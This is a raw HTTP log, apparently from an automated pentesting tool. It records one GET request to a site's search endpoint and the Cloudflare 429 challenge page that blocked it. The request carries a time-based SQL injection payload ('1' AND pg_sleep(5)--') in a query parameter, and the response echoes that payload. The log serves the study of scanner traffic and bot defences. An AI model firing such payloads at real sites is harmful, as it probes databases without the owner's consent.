REQUEST:
GET https://my.myfirst.tech/search?user=1%27%20AND%20pg_sleep%285%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9323
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847506863a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=OAFW5PWctXQCO1dujFBJJNZZbajD%2B%2B22tOSMRKOP%2BY0bgWkE%2B16e4piDd9u%2FfqY4nB50JAGRhdPVHG2n4cSgjK4iC5FNISECXLAOyFlSc1yOmmzKLbb4QhoReClrpAmzBw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847506863a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'Se25fanUBpq3Gkr3BsQ1eOGxyLyM5bQbgRupQgEpA9U-1784281157-1.2.1.1-dC9gVVFpswXeKHtk436Dbmm0ad8BZyUnFfRzK4WmvuE4am.WUZMje5uQOic1mR_M',cITimeS: '1784281157',cRay: 'a1c847506863a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?user=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_tk=OofpM6gzTmt_YpHRhbMniNXrZeu_7Q.wrSTI6GRRrnM-1784281157-1.0.1.1-B0MpqsXE1ntLIJy9wpQnkTNqyyrhIj0EhywO6eRc6io",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?user=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_f_tk=OofpM6gzTmt_YpHRhbMniNXrZeu_7Q.wrSTI6GRRrnM-1784281157-1.0.1.1-B0MpqsXE1ntLIJy9wpQnkTNqyyrhIj0EhywO6eRc6io",md: 'ogIUnITe9JgMkyOrG75sVP7kk.ZXzUkDxnuIh1e1eMI-1784281157-1.2.1.1-Q732rRlA9NWcmuoH0DUz51T0jH8KreYhdrIy_gk6vbdmq.e23p.1r1SdKaTG1ywho5U0fXkRSsD23o8Lpy_W33jd8sgBVtsISsghGnqXZjwtDv5D.ax1.wb8rbSURoIFMJKf3LCa8efpFBGp07nLj3h1AmRrAXNIhiUcOOFKql5kTLWvbRdH2WUk.m7cNqZxabFX2bGFPDmvEvTijiQR1uUkQDIlWbbaf6nYbaev7yVBmO11xSe5l.Eg7l6WZajlymmJZwmv7ipgo.1xp0uH1ostVM_uGFoLQIHu_8ZgcxR25vCF7AyrnWYdX.qXikFp53iaE1v9T.Dken7y_8VNYV4fCJsX8MGoXq2yMTifTtDw4pVp4yP76lcgLuQTgIRE5jwQPedoQldbYu5gNw8Tn0ZO28FQRVaEVI.JHKXdkWB60psqOZpDnkbXhYEAqQHAxmlsu2OGKzrZkGFyvJqz65ZT_Sr1wzcqdzAFbpPtnW4H030QNoA3Ft4sHYyCKn975Bnznt4Aj6..9WLgiBJ2oVEOqQF5v0Fh3gEnugGrBO64mbkvGPDB1faKdbYvsntLjfRxKOXkeO8VfbF8f0TpNGt4PfRab2YR8b9fRCqC.jKqLUEwLAGDGxJ6Bt_pKifRkkpbBjnDZ_5LFAV1PpMUwf9h.N7AscwE4W6WbsLytZV3m24pIdqolk6_9r.FsbinS6yok0mPUSo6i0RCql1MJ6ntSCk7KjXASxtgU18r7oEejKaqhAn_ekvCfIm2jJMkijgIsTyA3tTYJDYYc06L7Wln5QLzaSRptDgC2JEftLKnz5vXDl4ajRO3ybLNn_.eTKPuEnidkhAQPfgsykQX_M5W9oDlCtxEf1Nefm80m70R4RWil1_Je5TYmnA8lwOmIVB9HzHNJ4_2LO.Xya9Sv9_FWBNTq3uWVVsOGGdZsa0tYbYu9pBQmNdzeBDRWCewcYnp.KXklAaQUn4Eh2LVcVmftsBmmtdqweqPzp1ZJ.3z_5D6r5fzDS7OVTjDoEEsPLGEgPsXRlF5aSBkkIsUK94LmPItVZxAXeQ8Yp9ZFJkbSdFlyYYYwAkqVMvysQ3vAVBY06iYUPNR2I6mVDZ35lrOpo_97ryeS818aJQ5kcEk5FYVxjgm1N94iLS8GwGbQqsEeMvT5odamCqRC3z_g2WuskuSFNf_SSnV.UHMmEg',mdrd: 'LY3r8dR4TA4G9gAg.TxOP1_o5VD_KjifnBZ3oC.nnRU-1784281157-1.2.1.1-ionNy.9_FgWy28WH0JjLaVzpEciGat8amnjEkcSFkjwlgGTtR2iJRdTTWZ0.eYTFZ5rmoYb6QJc3iJXhcH.g2Uon54L6QtZUitYJX2bvDmY.Ccxo4NF.DnXKNMipjq4PbpLRaRJ_XS98pBABxrvR3651UURs.G5I0qx76FFfFXlxjKW62o8XD9RcEQpTeaXp4TvI0hfqFg7Sa2CxChx8hoFjj8LVi3jMOBc77C9A5LNFLgc8ZkiZKYW.3U78XQVE',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847506863a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?user=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_rt_tk=OofpM6gzTmt_YpHRhbMniNXrZeu_7Q.wrSTI6GRRrnM-1784281157-1.0.1.1-B0MpqsXE1ntLIJy9wpQnkTNqyyrhIj0EhywO6eRc6io"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
